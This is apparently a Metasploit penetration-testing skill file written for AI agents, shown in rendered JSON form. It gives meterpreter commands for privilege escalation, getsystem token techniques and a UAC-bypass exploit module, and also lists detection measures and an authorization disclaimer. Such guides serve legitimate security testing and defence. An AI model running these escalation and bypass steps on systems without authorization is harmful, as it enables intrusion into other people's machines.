TARGET \u003ctarget-index>\n\n# Try alternative payload\nmsf6 exploit(...) > show payloads\nmsf6 exploit(...) > set PAYLOAD \u003calternative-payload>","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Issue: Cannot Escalate Privileges","type":"text"}]},{"type":"paragraph","content":[{"text":"Solutions","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate escalation opportunities\nmeterpreter > run post/multi/recon/local_exploit_suggester\n\n# Try alternative techniques\nmeterpreter > getsystem -t 1 # Named Pipe Impersonation\nmeterpreter > getsystem -t 2 # Named Pipe Impersonation (Admin Drop)\nmeterpreter > getsystem -t 3 # Token Duplication\n\n# Use UAC bypass if applicable\nmeterpreter > background\nmsf6 > use exploit/windows/local/bypassuac_injection\nmsf6 exploit(bypassuac_injection) > set SESSION \u003csession-id>\nmsf6 exploit(bypassuac_injection) > exploit","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Defensive Considerations","type":"text"}]},{"type":"paragraph","content":[{"text":"Organizations can detect Metasploit activity by:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Network IDS","type":"text","marks":[{"type":"strong"}]},{"text":": Signature-based detection of default Metasploit payloads","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Endpoint Detection","type":"text","marks":[{"type":"strong"}]},{"text":": Behavioral analysis of meterpreter process injection","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Traffic Analysis","type":"text","marks":[{"type":"strong"}]},{"text":": Unusual outbound HTTPS connections to non-standard ports","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Memory Forensics","type":"text","marks":[{"type":"strong"}]},{"text":": Detection of reflective DLL injection techniques","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Log Analysis","type":"text","marks":[{"type":"strong"}]},{"text":": Unusual authentication patterns or process execution","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Enhance defensive posture:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Deploy endpoint detection and response (EDR) solutions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Enable PowerShell script block logging","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor for unusual parent-child process relationships","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Implement application whitelisting","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Detect lateral movement with network segmentation and monitoring","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Metasploit Documentation","type":"text","marks":[{"type":"link","attrs":{"href":"https://docs.metasploit.com/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Metasploit Unleashed","type":"text","marks":[{"type":"link","attrs":{"href":"https://www.offsec.com/metasploit-unleashed/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK Framework","type":"text","marks":[{"type":"link","attrs":{"href":"https://attack.mitre.org/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Penetration Testing Execution Standard (PTES)","type":"text","marks":[{"type":"link","attrs":{"href":"http://www.pentest-standard.org/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"OWASP Testing Guide","type":"text","marks":[{"type":"link","attrs":{"href":"https://owasp.org/www-project-web-security-testing-guide/","title":null}}]}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"pentest-metasploit","tags":["pentest","metasploit","exploitation","post-exploitation","vulnerability-validation","red-team"],"author":"@skillopedia","source":{"stars":336,"repo_name":"marketplace","origin_url":"https://github.com/aiskillstore/marketplace/blob/HEAD/skills/agentsecops/pentest-metasploit/SKILL.md","repo_owner":"aiskillstore","body_sha256":"aa5becff74d588924b5140b90f082ae9f1faa3bd10075b8a0f9fba47dc64b49f","cluster_key":"694ac08bc0f9475e441808e66bfd59e41bffe88f0fe3646a8dcdd19b21ed5381","clean_bundle":{"format":"clean-skill-bundle-v1","source":"aiskillstore/marketplace/skills/agentsecops/pentest-metasploit/SKILL.md","attachments":[{"id":"bca9d815-d9b8-5b0e-8b7a-61a221a39397","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/bca9d815-d9b8-5b0e-8b7a-61a221a39397/attachment.yml","path":"assets/ci-config-template.yml","size":11105,"sha256":"0fc554799a0e03a44883990f208f2a428f3c1e70eed1a9bcfbc01e728962b91e","contentType":"application/yaml; charset=utf-8"},{"id":"17ec0958-98f6-58c6-9698-a905aad16104","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/17ec0958-98f6-58c6-9698-a905aad16104/attachment.yaml","path":"assets/rule-template.yaml","size":11044,"sha256":"cb228a390bcd3745cafb1783c6337d9106ae179e853935ae19c90caac10a0497","contentType":"application/yaml; charset=utf-8"},{"id":"87b538d0-7853-5867-ae67-d9012501115d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/87b538d0-7853-5867-ae67-d9012501115d/attachment.md","path":"references/EXAMPLE.md","size":15672,"sha256":"d830809dec44c82770c5ef0fe12831754f113931dc739891a1ec8186aefc629f","contentType":"text/markdown; charset=utf-8"},{"id":"c626912e-5b69-5db0-abab-bac9d9197485","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/c626912e-5b69-5db0-abab-bac9d9197485/attachment.md","path":"references/WORKFLOW_CHECKLIST.md","size":8390,"sha256":"f667c8d5c6e5c50b491643d644082ff202a6bb94476e0e7b648c6d0e5c8a080f","contentType":"text/markdown; charset=utf-8"},{"id":"704dfdee-9ce3-587b-a3ff-c153749906c0","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/704dfdee-9ce3-587b-a3ff-c153749906c0/attachment.json","path":"skill-report.json","size":29293,"sha256":"f20ccdff57cadb8b86506da199425c7be334c23d880923c49fdf1c6149018942","contentType":"application/json; charset=utf-8"}],"bundle_sha256":"553586da1863fa2bfbaeef10943de28240ec553786a94bb4149165d11e13cd39","attachment_count":5,"text_attachments":5,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/agentsecops/pentest-metasploit/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"testing-qa","category_label":"Testing"},"exact_dupes_collapsed_into_this":0},"version":"v1","category":"testing-qa","frameworks":["MITRE-ATT&CK","OWASP","PTES"],"import_tag":"clean-skills-v1","maintainer":"[email protected]","references":["https://docs.metasploit.com/","https://www.offsec.com/metasploit-unleashed/","https://attack.mitre.org/"],"description":"Penetration testing framework for exploit development, vulnerability validation, and authorized security assessments using Metasploit Framework. Use when: (1) Validating vulnerabilities in authorized security assessments, (2) Demonstrating exploit impact for security research, (3) Testing defensive controls in controlled environments, (4) Conducting authorized penetration tests with proper scoping and authorization, (5) Developing post-exploitation workflows for red team operations.\n","dependencies":{"tools":["postgresql","nmap"],"packages":["metasploit-framework"]}}},"renderedAt":1782980857671}

Metasploit Framework Penetration Testing Overview Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery. IMPORTANT : This skill is for AUTHORIZED security testing only. Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities. Quick Start Initialize Metasploit console and verify database connectivity: C…